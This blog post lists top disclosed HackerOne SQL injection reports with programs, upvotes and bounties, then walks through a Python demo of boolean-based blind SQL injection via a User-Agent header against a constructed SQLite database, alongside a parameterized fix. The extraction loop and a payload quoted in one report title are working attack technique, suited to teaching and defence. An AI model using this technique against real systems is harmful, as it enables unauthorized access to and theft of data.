Fluent::Programmer


Summarizing Top SQL Injection Bug Bounty Reports 👋

By Fluent Programmer · 23 min read

Quick summary ↬ The most upvoted SQL injection reports disclosed on HackerOne, ranked by upvotes, with the program that received each report and the bounty it paid. Read as a set, the titles alone teach a good deal about the hacker's mindset: where the injectable input was found, how far each finding was pushed, and what that was worth.

A few patterns stand out. The injection point is frequently not a query-string parameter: a User-Agent header (report 2), a cookie (11), a Referer header (211), the URL path itself (100), array-style parameters such as countryFilter[] and list[] (9, 30), a GraphQL argument (29) and Android content providers (95, 118, 135) all appear. Many entries are blind, boolean-based or time-based, meaning the data was inferred one yes/no answer at a time rather than read off an error page. Several of the larger bounties went to reports that were pushed past a bare proof of concept: SQL injection chained into remote code execution (6, 18, 22, 111, 126), a WAF bypass (21, 63, 151), or a demonstration of exactly which data was reachable (1, 79). Finally, a sizeable share sits in third-party or framework code rather than the program's own endpoints: ORMs and database client libraries (131, 226, 234, 247), WordPress and Drupal components (83, 123, 141), and NoSQL injection in Rocket.Chat (124, 160).

Top SQLI reports from HackerOne

Each entry reads: rank. report title to program - upvotes, bounty in USD (0 where no bounty was paid or disclosed).

  1. SQL Injection Extracts Starbucks Enterprise Accounting, Financial, Payroll Database to Starbucks - 737 upvotes, 4000
  2. SQL injection in https://labs.data.gov/dashboard/datagov/csv_to_json via User-agent to GSA Bounty - 665 upvotes, 2000
  3. Time-Based SQL injection at city-mobil.ru to Mail.ru - 620 upvotes, 15000
  4. SQL injection at https://sea-web.gold.razer.com/ajax-get-status.php via txid parameter to Razer - 580 upvotes, 2000
  5. SQL Injection in https://api-my.pay.razer.com/inviteFriend/getInviteHistoryLog to Razer - 528 upvotes, 2000
  6. SQL injection on contactws.contact-sys.com in TScenObject action ScenObjects leads to remote code execution to QIWI - 465 upvotes, 5500
  7. Blind SQL Injection to InnoGames - 432 upvotes, 2000
  8. SQL injection at fleet.city-mobil.ru to Mail.ru - 369 upvotes, 10000
  9. SQL Injection in report_xml.php through countryFilter[] parameter to Valve - 347 upvotes, 25000
  10. [windows10.hi-tech.mail.ru] Blind SQL Injection to Mail.ru - 326 upvotes, 5000
  11. SQL Injection on cookie parameter to MTN Group - 299 upvotes, 0
  12. [www.zomato.com] SQLi - /php/██████████ - item_id to Zomato - 279 upvotes, 4500
  13. SQL Injection at https://sea-web.gold.razer.com/lab/cash-card-incomplete-translog-resend via period-hour Parameter to Razer - 240 upvotes, 2000
  14. [api.easy2pay.co] SQL Injection at fortumo via TransID parameter [Bypassing Signature Validation🔥] to Razer - 232 upvotes, 4000
  15. Boolean-based SQL Injection on relap.io to Mail.ru - 225 upvotes, 2000
  16. Blind SQL Injection in city-mobil.ru domain to Mail.ru - 223 upvotes, 2000
  17. SQL Injection in agent-manager to Acronis - 222 upvotes, 1500
  18. Blind SQLi leading to RCE, from Unauthenticated access to a test API Webservice to Starbucks - 217 upvotes, 4000
  19. SQL Injection in www.hyperpure.com to Zomato - 211 upvotes, 2000
  20. Blind SQL injection and making any profile comments from any users to disappear using “like” function (2 in 1 issues) to Pornhub - 208 upvotes, 2500
  21. Blind SQL Injection on starbucks.com.gt and WAF Bypass :* to Starbucks - 201 upvotes, 500
  22. Remote Code Execution on contactws.contact-sys.com via SQL injection in TCertObject operation “Delete” to QIWI - 193 upvotes, 1000
  23. SQLi at https://sea-web.gold.razer.com/demo-th/purchase-result.php via orderid Parameter to Razer - 183 upvotes, 2000
  24. Blind SQL injection in Hall of Fap to Pornhub - 174 upvotes, 2500
  25. www.drivegrab.com SQL injection to Grab - 172 upvotes, 4500
  26. Sql injection on docs.atavist.com to Automattic - 156 upvotes, 200
  27. SQL Injection [unauthenticated] with direct output at https://news.mail.ru/ to Mail.ru - 155 upvotes, 7500
  28. bypass sql injection #1109311 to Acronis - 148 upvotes, 500
  29. SQL injection in GraphQL endpoint through embedded_submission_form_uuid parameter to HackerOne - 147 upvotes, 0
  30. SQL injection in Razer Gold List Admin at /lists/index.php via the list[] parameter. to Razer - 122 upvotes, 2000
  31. SQL Injection Union Based to Automattic - 121 upvotes, 350
  32. [intensedebate.com] SQL Injection Time Based On /js/commentAction/ to Automattic - 120 upvotes, 350
  33. SQL Injection at api.easy2pay.co/add-on/get-sig.php via partner_id Parameter to Razer - 119 upvotes, 2000
  34. SQL injection on contactws.contact-sys.com in TRateObject.AddForOffice in USER_ID parameter leads to remote code execution to QIWI - 117 upvotes, 1000
  35. SQL Injection at https://files.palantir.com/ due to CVE-2021-38159 to Palantir Public - 107 upvotes, 5000
  36. SQL injection on admin.acronis.host development web service to Acronis - 102 upvotes, 250
  37. SQL injection in https://www.acronis.cz/ via the log parameter to Acronis - 95 upvotes, 250
  38. turboslim.lady.mail.ru - Blind sql-injection. to Mail.ru - 90 upvotes, 5000
  39. SQL Injection intensedebate.com to Automattic - 86 upvotes, 350
  40. SQL injection on jd.mail.ru to Mail.ru - 86 upvotes, 300
  41. Remote Code Execution on contactws.contact-sys.com via SQL injection in TAktifBankObject.GetOrder in parameter DOC_ID to QIWI - 84 upvotes, 2500
  42. 3igames.mail.ru SQL Injection to Mail.ru - 84 upvotes, 1500
  43. SQL Injection on sctrack.email.uber.com.cn to Uber - 80 upvotes, 4000
  44. Blind SQL Injection at http://easytopup.in.th/es-services/mps.php via serial_no parameter to Razer - 80 upvotes, 1000
  45. SQL Injection on www.██████████ on countID parameter to U.S. Dept Of Defense - 79 upvotes, 0
  46. [Found Origin IP's Lead To Access To Grafana Instance , PgHero Instance [ Can SQL Injection ] to Omise - 76 upvotes, 200
  47. SQL injection delivery-club.ru (ClickHouse) to Mail.ru - 75 upvotes, 5000
  48. SQL Injection on https://www.olx.co.id to OLX - 74 upvotes, 0
  49. Arbitrary SQL command injection to Nextcloud - 73 upvotes, 500
  50. [intensedebate.com] SQL Injection Time Based on /changeReplaceOpt.php to Automattic - 72 upvotes, 350
  51. SQL injection at https://sea-web.gold.razer.com/demo-th/goto-e2p-web-api.php via Multiple Parameters to Razer - 71 upvotes, 2000
  52. SQL Injection in ████ to U.S. Dept Of Defense - 71 upvotes, 0
  53. Blind SQL Injection(Time Based Payload) in https://www.easytopup.in.th/store/game/digimon-master via CheckuserForm[user_id] to Razer - 68 upvotes, 1000
  54. RCE, SQLi, IDOR, Auth Bypass and XSS at [staff.███.edu.eg ] to ██████ - 68 upvotes, 0
  55. [https://reviews.zomato.com] Time Based SQL Injection to Zomato - 66 upvotes, 1000
  56. Blind SQL injection at tsftp.informatica.com to Informatica - 66 upvotes, 0
  57. SQL Injection at https://lite.r-keeper.ru/site_api/clients/derision/?lang=ru to Mail.ru - 61 upvotes, 1500
  58. [www.zomato.com] SQLi on order_id parameter to Zomato - 60 upvotes, 1000
  59. Blind SQL injection in third-party software, that allows to reveal user statistic from rocket.chat and possibly hack into the rocketchat.agilecrm.com to Rocket.Chat - 59 upvotes, 0
  60. [www.zomato.com] Blind SQL Injection in /php/geto2banner to Zomato - 58 upvotes, 2000
  61. SQL injection in 3rd party software Anomali to Uber - 57 upvotes, 2500
  62. Time-base SQL Injection in Search Users to Concrete CMS - 56 upvotes, 0
  63. [www.zomato.com] Union SQLi + Waf Bypass to Zomato - 54 upvotes, 1000
  64. Remote Code Execution on contactws.contact-sys.com via SQL injection in TPrabhuObject.BeginOrder in parameter DOC_ID to QIWI - 52 upvotes, 2500
  65. Unauthenticated SQL Injection at █████████ [HtUS] to U.S. Dept Of Defense - 52 upvotes, 1000
  66. Blind SQL Injection on news.mail.ru to Mail.ru - 51 upvotes, 3000
  67. SQL Injection https://www.olx.co.id to OLX - 51 upvotes, 0
  68. SQL Injection /webApp/oma_conf ctx parameter (viestinta.lahitapiola.fi) to LocalTapiola - 50 upvotes, 1350
  69. A SQL injection vulnerability in Vanilla to Vanilla - 50 upvotes, 600
  70. [contact-sys.com] SQL Injection ████ limit param to QIWI - 50 upvotes, 250
  71. SQL Injection in IBM access control panel & Broken access in admin panel to IBM - 48 upvotes, 0
  72. SQL Injection in ████ to U.S. Dept Of Defense - 46 upvotes, 0
  73. [www.zomato.com] Blind SQL Injection in /php/widgets_handler.php to Zomato - 45 upvotes, 2000
  74. Vanilla SQL Injection Vulnerability to Vanilla - 44 upvotes, 600
  75. SQL Injection vulnerability located at ████████ to U.S. Dept Of Defense - 44 upvotes, 0
  76. [city-mobil.ru/taxiserv/] SQLi at /taxiserv/tariffs/dictionary at filter{“id_locality”} param to Mail.ru - 43 upvotes, 3500
  77. SQL Injection on /webApp/omatalousuk (viestinta.lahitapiola.fi) to LocalTapiola - 41 upvotes, 1560
  78. Multiple SQL Injections and constrained LFI in esk-static.3igames.mail.ru to Mail.ru - 40 upvotes, 1500
  79. SQLI on uberpartner.eu leads to exposure of sensitive user data of Uber partners to Uber - 40 upvotes, 1500
  80. Type Juggling -> PHP Object Injection -> SQL Injection Chain to ExpressionEngine - 39 upvotes, 0
  81. SQL injection in MilestoneFinder order method to GitLab - 38 upvotes, 2000
  82. [www.zomato.com] Boolean SQLi - /█████.php to Zomato - 38 upvotes, 1000
  83. SQL injection in Wordpress Plugin Huge IT Video Gallery at https://drive.uber.com/frmarketplace/ to Uber - 37 upvotes, 3000
  84. SQL Injection in sijoitustalous_peruutus (viestinta.lahitapiola.fi) to LocalTapiola - 36 upvotes, 1350
  85. Blind SQL Injection to MTN Group - 36 upvotes, 0
  86. [www.zomato.com] Boolean SQLi - /███████.php to Zomato - 34 upvotes, 1000
  87. sqli to Ubiquiti Inc. - 33 upvotes, 1000
  88. Blind SQL injection [https://honor.hi-tech.mail.ru] to Mail.ru - 33 upvotes, 300
  89. Time-based Blind SQLi on news.starbucks.com to Starbucks - 33 upvotes, 0
  90. [lk.contact-sys.com] SQL Injection reset_password FP_LK_USER_LOGIN to QIWI - 32 upvotes, 300
  91. SQL Injection at https://lite.r-keeper.ru/site_api/localize/translate/rklscommon/ru to Mail.ru - 31 upvotes, 1500
  92. sql injection via https://setup.p2p.ihost.com/ to IBM - 31 upvotes, 0
  93. Blind SQL injection on [city-mobil.ru/taxiserv/] in filter{“id_locality”} to Mail.ru - 30 upvotes, 3500
  94. Time Based SQL-inject in post-parameter login[username] [domain - youporn.com] to Pornhub - 30 upvotes, 2500
  95. SQL Injection found in NextCloud Android App Content Provider to Nextcloud - 30 upvotes, 150
  96. Sql-inj in https://maximum.com/ajax/people to Radancy - 29 upvotes, 40
  97. allods.mail.ru sql injection to Mail.ru - 28 upvotes, 2200
  98. SQL injection to U.S. Dept Of Defense - 28 upvotes, 0
  99. SQL injection my method -1 OR 321=6 AND 000159=000159 to U.S. Dept Of Defense - 28 upvotes, 0
  100. SQL injection in URL path processing on www.ibm.com to IBM - 28 upvotes, 0
  101. SQL Injection on /cs/Satellite path to LocalTapiola - 27 upvotes, 400
  102. SQL Injection /webApp/cancel_iltakoulu regId parameter (viestinta.lahitapiola.fi) to LocalTapiola - 26 upvotes, 1350
  103. SQL injection in partner id field on https://www.teavana.com (Sign-up form) to Starbucks - 26 upvotes, 250
  104. [ipm.informatica.com] Sql injection Oracle to Informatica - 26 upvotes, 0
  105. SQLI on desafio5estrelas.com to Uber - 24 upvotes, 2500
  106. SQL injection at [https://█████████] [HtUS] to U.S. Dept Of Defense - 24 upvotes, 1000
  107. SQL Injection in the move_papers.php on the https://██████████ to U.S. Dept Of Defense - 24 upvotes, 0
  108. SQL Injection on the administrator panel to MTN Group - 23 upvotes, 0
  109. gmmovinparts.com SQLi via forgot_password.jsp to General Motors - 22 upvotes, 0
  110. SQL injection on the https://████/ to U.S. Dept Of Defense - 22 upvotes, 0
  111. Ability to escape database transaction through SQL injection, leading to arbitrary code execution to HackerOne - 22 upvotes, 0
  112. SQL Injection at https://████████.asp (█████████) [selMajcom] [HtUS] to U.S. Dept Of Defense - 22 upvotes, 0
  113. [critical] sql injection by GET method to Khan Academy - 21 upvotes, 0
  114. SQL Injection, exploitable in boolean mode to Zomato - 20 upvotes, 300
  115. Blind Based SQL Injection in 3d.sc.money to CS Money - 20 upvotes, 0
  116. Blind User-Agent SQL Injection to Blind Remote OS Command Execution at █████████ to Sony - 20 upvotes, 0
  117. SQL Injection in lapsuudenturva (viestinta.lahitapiola.fi) to LocalTapiola - 19 upvotes, 1350
  118. SQLi allow query restriction bypass on exposed FileContentProvider to Nextcloud - 19 upvotes, 100
  119. SQL Injection at /displayPDF.php (printshop.engelvoelkers.com) to Engel & Völkers Technology GmbH - 19 upvotes, 0
  120. SQL Injection on https://soa-accp.glbx.tva.gov/ via “/api/” path - VI-21-015 to Tennessee Valley Authority - 19 upvotes, 0
  121. SQL Injection on /webApp/sijoitustalousuk email-parameter + potential lack of CSRF Token (viestinta.lahitapiola.fi) to LocalTapiola - 17 upvotes, 1350
  122. SQL injection vulnerability on a DoD website to U.S. Dept Of Defense - 17 upvotes, 0
  123. WordPress DB Class, bad implementation of prepare method guides to sqli and information disclosure to WordPress - 17 upvotes, 0
  124. Pre-Auth Blind NoSQL Injection leading to Remote Code Execution to Rocket.Chat - 17 upvotes, 0
  125. Blind SQL Injection to U.S. Dept Of Defense - 17 upvotes, 0
  126. Unsafe deserialization in Libera Pay allows to escalate a SQL injection to Remote Command Execution to Liberapay - 16 upvotes, 0
  127. SQL Injection through /include/findusers.php to ImpressCMS - 16 upvotes, 0
  128. time based SQL injection at [https://███] [HtUS] to U.S. Dept Of Defense - 15 upvotes, 1000
  129. uchi.ru check_lessons Blind SQL Injection to Mail.ru - 15 upvotes, 750
  130. SQL Injection /webApp/sijoitustalous_peruutus locId parameter (viestinta.lahitapiola.fi) to LocalTapiola - 15 upvotes, 350
  131. [typeorm] SQL Injection to Node.js third-party modules - 15 upvotes, 0
  132. https://zest.co.th/zestlinepay/checkproduct API endpoint suffers from Boolean-based SQL injection to Razer - 15 upvotes, 0
  133. SQL Injection on [█████████] to Sony - 15 upvotes, 0
  134. C++: Support Pqxx connector to search for sql injections to Postgres to GitHub Security Lab - 14 upvotes, 4500
  135. Local SQL Injection in Content Provider (ru.mail.data.contact.ContactsProvider) of Mail.ru for Android, version 12.2.0.29734 to Mail.ru - 14 upvotes, 150
  136. [Informational] Possible SQL Injection in inc/ajax-actions-frontend.php to MapsMarker.com e.U. - 14 upvotes, 10
  137. Blind SQLi vulnerability in a DoD Website to U.S. Dept Of Defense - 14 upvotes, 0
  138. [untitled-model] sql injection to Node.js third-party modules - 14 upvotes, 0
  139. Blind SQL injection on ████████ to U.S. Dept Of Defense - 14 upvotes, 0
  140. [api.easy2pay.co] SQL Injection in cashcard via card_no parameter ⭐️Bypassing IP whitelist⭐️ to Razer - 14 upvotes, 0
  141. Drupal 7 pre auth sql injection and remote code execution to Internet Bug Bounty - 13 upvotes, 3000
  142. SQL injection vulnerability on a DoD website to U.S. Dept Of Defense - 13 upvotes, 0
  143. [query-mysql] SQL Injection due to lack of user input sanitization allows to run arbitrary SQL queries when fetching data from database to Node.js third-party modules - 13 upvotes, 0
  144. SQL injection at [█████████] [HtUS] to U.S. Dept Of Defense - 12 upvotes, 1000
  145. Code source disclosure & ability to get database information “SQL injection” in [townwars.mail.ru] to Mail.ru - 12 upvotes, 150
  146. blind sql injection to Hanno's projects - 12 upvotes, 0
  147. SQL injections to U.S. Dept Of Defense - 12 upvotes, 0
  148. SQL injection when configuring a database to ImpressCMS - 12 upvotes, 0
  149. SQL Injection on █████ to U.S. Dept Of Defense - 12 upvotes, 0
  150. SQL Injection vulnerability in a DoD website to U.S. Dept Of Defense - 11 upvotes, 0
  151. MSSQL injection via param Customwho in https://█████/News/Transcripts/Search/Sort/ and WAF bypass to U.S. Dept Of Defense - 11 upvotes, 0
  152. stripo blog search SQL Injection to Stripo Inc - 11 upvotes, 0
  153. SQL Injection in Login Page: https://█████/█████████/login.php to U.S. Dept Of Defense - 11 upvotes, 0
  154. [city-mobil.ru/taxiserv/] SQLi at /taxiserv/requests path at driver_company param to Mail.ru - 10 upvotes, 3500
  155. bit.games - sql-inj to Mail.ru - 10 upvotes, 1500
  156. SQL injection on █████ due to tech.cfm to U.S. Dept Of Defense - 10 upvotes, 0
  157. Time-based sql-injection on https://puzzle.mail.ru to Mail.ru - 9 upvotes, 300
  158. Blind SQLi in a DoD Website to U.S. Dept Of Defense - 9 upvotes, 0
  159. Time Based SQL Injection vulnerability on a DoD website to U.S. Dept Of Defense - 9 upvotes, 0
  160. Post-Auth Blind NoSQL Injection in the users.list API leads to Remote Code Execution to Rocket.Chat - 9 upvotes, 0
  161. SQL Injection and plaintext passwords via User Search to IBM - 9 upvotes, 0
  162. Sql Injection At █████████ to U.S. Dept Of Defense - 9 upvotes, 0
  163. [afocusp.informatica.com] Sql injection afocusp.informatica.com:37777 to Informatica - 8 upvotes, 0
  164. [Android API] SQL injection ( errortoken.json ) to Pornhub - 8 upvotes, 0
  165. [███] SQL injection & Reflected XSS to U.S. Dept Of Defense - 8 upvotes, 0
  166. SQLi in login form of █████ to U.S. Dept Of Defense - 8 upvotes, 0
  167. SQLi on █████████ to U.S. Dept Of Defense - 8 upvotes, 0
  168. SQL Injection on /webApp/lapsuudenturva (viestinta.lahitapiola.fi) to LocalTapiola - 7 upvotes, 1350
  169. Sql injection on /webApp/sijoituswebinaari (viestinta.lahitapiola.fi) to LocalTapiola - 7 upvotes, 350
  170. SQL Injection on /webApp/viivanalle (viestinta.lahitapiola.fi) to LocalTapiola - 7 upvotes, 350
  171. Blind SQL Injection to ok.ru - 7 upvotes, 300
  172. [cfire.mail.ru] Time Based SQL Injection 2 to Mail.ru - 7 upvotes, 200
  173. [informatica.com] Blind SQL Injection to Informatica - 7 upvotes, 0
  174. SQL Injection vulnerability on a DoD website to U.S. Dept Of Defense - 7 upvotes, 0
  175. SQL injection vulnerability on a DoD website to U.S. Dept Of Defense - 7 upvotes, 0
  176. SQL injection vulnerability on a DoD website to U.S. Dept Of Defense - 7 upvotes, 0
  177. Weak credentials, Blind SQLi, Timing attack, that leads to web admin access to 50m-ctf - 7 upvotes, 0
  178. [████████] Boolean SQL Injection (/personnel.php?content=profile&rcnum=*) to U.S. Dept Of Defense - 7 upvotes, 0
  179. SQL Injection in www.██████████ to U.S. Dept Of Defense - 7 upvotes, 0
  180. SQL Injection leads to retrieve the contents of an entire database. to BlockDev Sp. Z o.o - 7 upvotes, 0
  181. SQL injection via vulnerable doctrine/dbal version to Nextcloud - 7 upvotes, 0
  182. SQL Injection on https://████████/ to U.S. Dept Of Defense - 7 upvotes, 0
  183. SQL Injection in the get_publications.php on the https://█████ to U.S. Dept Of Defense - 6 upvotes, 0
  184. SQL Injection or Denial of Service due to a Prototype Pollution to Node.js third-party modules - 6 upvotes, 0
  185. SQL injection at /admin.php?/cp/members/create to ExpressionEngine - 6 upvotes, 0
  186. SQL Injection in █████ to U.S. Dept Of Defense - 6 upvotes, 0
  187. SQLi on http://sports.yahoo.com/nfl/draft to Yahoo! - 5 upvotes, 3705
  188. Golang : Add MongoDb NoSQL injection sinks to GitHub Security Lab - 5 upvotes, 1800
  189. tmgame.mail.ru - Blind sql injection to Mail.ru - 5 upvotes, 250
  190. [townwars.mail.ru] Time-Based SQL Injection to Mail.ru - 5 upvotes, 150
  191. [parapa.mail.ru] SQL Injection repeat to Mail.ru - 5 upvotes, 150
  192. SQL Injection vulnerability in a DoD website to U.S. Dept Of Defense - 5 upvotes, 0
  193. sql injection vulnerability found to Legal Robot - 5 upvotes, 0
  194. sql injection on /messagecenter/messagingcenter at https://www.███████/ to U.S. Dept Of Defense - 5 upvotes, 0
  195. SQL injection [futexpert.mtngbissau.com] to MTN Group - 5 upvotes, 0
  196. Blind SQL Injection to U.S. Dept Of Defense - 5 upvotes, 0
  197. SQL injection vulnerability on a DoD website to U.S. Dept Of Defense - 4 upvotes, 0
  198. SQL Injection vulnerability in a DoD website to U.S. Dept Of Defense - 4 upvotes, 0
  199. SQL Injection vulnerability in a DoD website to U.S. Dept Of Defense - 4 upvotes, 0
  200. SQL injection vulnerability in a DoD website to U.S. Dept Of Defense - 4 upvotes, 0
  201. SQL injection vulnerability on a DoD website to U.S. Dept Of Defense - 4 upvotes, 0
  202. SQL Injection vulnerability in a DoD website to U.S. Dept Of Defense - 4 upvotes, 0
  203. Code reversion allowing SQLI again in ███████ to U.S. Dept Of Defense - 4 upvotes, 0
  204. SQLi in love.uber.com to Uber - 3 upvotes, 3000
  205. SQL Injection ON HK.Promotion to Yahoo! - 3 upvotes, 1000
  206. caesary.yahoo.net Blind Sql Injection to Yahoo! - 3 upvotes, 0
  207. Time Based SQL Injection vulnerability on a DoD website to U.S. Dept Of Defense - 3 upvotes, 0
  208. SQL injection in Serendipity (serendipity_fetchComments) to Hanno's projects - 3 upvotes, 0
  209. SQL injection on https://███████ to U.S. Dept Of Defense - 3 upvotes, 0
  210. [CRITICAL] Sql Injection on http://axa.dxi.eu to 8x8 - 3 upvotes, 0
  211. [████] SQL Injections on Referer Header exploitable via Time-Based method to U.S. Dept Of Defense - 3 upvotes, 0
  212. SQL injection located in ███ in POST param ████████ to U.S. Dept Of Defense - 3 upvotes, 0
  213. [Python]: Add SqlAlchemy support for SQL injection query to GitHub Security Lab - 2 upvotes, 4500
  214. [Python] CWE-943: Add NoSQL Injection Query to GitHub Security Lab - 2 upvotes, 1800
  215. [https://www.anghami.com/updatemailinfo/] Sql Injection to Anghami - 2 upvotes, 300
  216. [orsotenslimselfie.lady.mail.ru] SQL Injection to Mail.ru - 2 upvotes, 300
  217. SQL injection update.mail.ru to Mail.ru - 2 upvotes, 250
  218. SQL inj to Mail.ru - 2 upvotes, 150
  219. SQL Injection on 11x11.mail.ru to Mail.ru - 2 upvotes, 150
  220. [tidaltrek.mail.ru] SQL Injection to Mail.ru - 2 upvotes, 150
  221. Sql injection And XSS to Khan Academy - 2 upvotes, 0
  222. Possible SQL injection can cause denial of service attack to Dropbox - 2 upvotes, 0
  223. SQL injection in conc/index.php/ccm/system/search/users/submit to Concrete CMS - 2 upvotes, 0
  224. SQL Injection vulnerability in a DoD website to U.S. Dept Of Defense - 2 upvotes, 0
  225. SQL Injection vulnerability in a DoD website to U.S. Dept Of Defense - 2 upvotes, 0
  226. sql does not properly escape parameters when building SQL queries, resulting in potential SQLi to Node.js third-party modules - 2 upvotes, 0
  227. Blind SQL Injection on DoD Site to U.S. Dept Of Defense - 2 upvotes, 0
  228. [@azhou/basemodel] SQL injection to Node.js third-party modules - 2 upvotes, 0
  229. Followup - SQL Injection - https://██████████/██████/MSI.portal to U.S. Dept Of Defense - 2 upvotes, 0
  230. SQL injection (stacked queries) in the export to Excel functionality on Vidyo Server to 8x8 - 2 upvotes, 0
  231. SQL INJECTION in https://████/██████████ to U.S. Dept Of Defense - 2 upvotes, 0
  232. NoSQL-Injection discloses S3 File Upload URLs to Rocket.Chat - 2 upvotes, 0
  233. [Java] CWE-089: MyBatis Mapper XML SQL Injection to GitHub Security Lab - 1 upvotes, 4500
  234. Active Record SQL Injection Vulnerability Affecting PostgreSQL to Ruby on Rails - 1 upvotes, 1500
  235. Active Record SQL Injection Vulnerability Affecting PostgreSQL to Ruby on Rails - 1 upvotes, 1500
  236. SQL inj to Mail.ru - 1 upvotes, 150
  237. [parapa.mail.ru] SQL Injection to Mail.ru - 1 upvotes, 150
  238. [3k.mail.ru] SQL Injection to Mail.ru - 1 upvotes, 150
  239. SQL Injection to Mail.ru - 1 upvotes, 150
  240. [tidaltrek.mail.ru] SQL Injection to Mail.ru - 1 upvotes, 150
  241. Possible SQL injection on “Jump to twitter” to Gratipay - 1 upvotes, 1
  242. SQL injection, tile ID to Uzbey - 1 upvotes, 0
  243. SQL Injection to Uzbey - 1 upvotes, 0
  244. Blind SQL INJ to Paragon Initiative Enterprises - 1 upvotes, 0
  245. Time Based SQL injection in url parameter to WebSummit - 1 upvotes, 0
  246. SQL Injection Proof of Concept for Starbucks URL to Starbucks - 1 upvotes, 0
  247. typeorm does not properly escape parameters when building SQL queries, resulting in potential SQLi to Node.js third-party modules - 1 upvotes, 0
  248. SQL injection found in US Navy Website (http://███/) to U.S. Dept Of Defense - 1 upvotes, 0
  249. [increments] sql injection to Node.js third-party modules - 1 upvotes, 0
  250. [afisha.mail.ru] SQL Injection to Mail.ru - 0 upvotes, 300
  251. SQL injection [hole in the forum engine] to Mail.ru - 0 upvotes, 200
  252. Time based sql injection to Mail.ru - 0 upvotes, 200
  253. [cfire.mail.ru] Time Based SQL Injection to Mail.ru - 0 upvotes, 150
  254. Time-Based Blind SQL Injection Attacks to Mail.ru - 0 upvotes, 150
  255. SQL injection, time zoom script, tile ID to Uzbey - 0 upvotes, 0
  256. SQL Injection Vulnerability in Concrete5 version 5.7.3.1 to Concrete CMS - 0 upvotes, 0
  257. Possible Blind SQL injection | Language choice in presentation to Gratipay - 0 upvotes, 0
  258. Two Error-Based SQLi in courses.aspx on ██████████ to U.S. Dept Of Defense - 0 upvotes, 0
  259. SQL Injection - https://███/█████████/MSI.portal to U.S. Dept Of Defense - 0 upvotes, 0
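The technique behind a large share of the entries above (an HTTP header or parameter concatenated into a query, then exploited blind with boolean-based probes) is easy to see in a few lines. The following is an added example written for this page, not code from the original post or from any of the reports listed: a vulnerable per-User-Agent lookup, the same lookup with a bound parameter, and the extraction loop an attacker runs against each. It runs against an in-memory SQLite database; the table names, columns, sample rows and the "admin" password are constructed for the demonstration and correspond to no real target.

```python
"""Boolean-based blind SQL injection through a User-Agent header, against an
in-memory SQLite database.  Added example for this page; the schema, rows,
endpoint logic and the 'admin' password are constructed for illustration."""
import sqlite3
import string
from typing import Callable


def make_db() -> sqlite3.Connection:
    """Constructed sample data: a per-User-Agent hit counter that the page
    reads, plus a users table the attacker is not supposed to reach."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE visits (ua TEXT, hits INTEGER)")
    conn.execute("INSERT INTO visits VALUES ('Mozilla/5.0', 3)")
    conn.execute("CREATE TABLE users (name TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin', 's3cret')")
    return conn


def seen_before_vulnerable(conn: sqlite3.Connection, user_agent: str) -> bool:
    """Vulnerable lookup: the raw header value is spliced into the SQL text.
    The caller only learns whether a row came back (say, a 'welcome back'
    banner is rendered or not), which is exactly the one-bit oracle a
    boolean-based blind injection needs."""
    sql = f"SELECT hits FROM visits WHERE ua = '{user_agent}'"
    return conn.execute(sql).fetchone() is not None


def seen_before_fixed(conn: sqlite3.Connection, user_agent: str) -> bool:
    """Hardened lookup: the header is bound as a parameter, so whatever it
    contains is compared as a string value and never parsed as SQL."""
    sql = "SELECT hits FROM visits WHERE ua = ?"
    return conn.execute(sql, (user_agent,)).fetchone() is not None


def extract_admin_password(oracle: Callable[[str], bool],
                           charset: str = string.ascii_lowercase + string.digits,
                           max_len: int = 32) -> str:
    """Recover users.password for 'admin' one character at a time.

    Each probe keeps the legitimate match ('Mozilla/5.0') and ANDs it with a
    subquery that is true only when the guessed character at position `pos`
    is right; the query's own trailing quote closes the payload.  A
    time-based variant is the same loop with a delay in place of the
    content difference."""
    recovered = ""
    for pos in range(1, max_len + 1):
        for ch in charset:
            probe = ("Mozilla/5.0' AND (SELECT substr(password, %d, 1) "
                     "FROM users WHERE name = 'admin') = '%s" % (pos, ch))
            if oracle(probe):
                recovered += ch
                break
        else:
            # No character matched: we have read past the end of the value.
            break
    return recovered


def run_demo() -> dict:
    """Run the extraction against both lookups and return what each leaked."""
    db = make_db()
    return {
        "vulnerable": extract_admin_password(lambda p: seen_before_vulnerable(db, p)),
        "fixed": extract_admin_password(lambda p: seen_before_fixed(db, p)),
    }


if __name__ == "__main__":
    for variant, leaked in run_demo().items():
        print(f"{variant}: {leaked!r}")
```

The probe string never has to be syntactically complete on its own: the vulnerable query supplies the opening and closing quotes, which is why a single stray `'` in a header is enough. Against the parameterized version every probe is compared as a literal User-Agent string, no row matches, and the loop exits on the first position with nothing recovered.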

About The Author

Fluentprogrammer doesn't need coffee to program. They run on pure caffeine and lines of code.
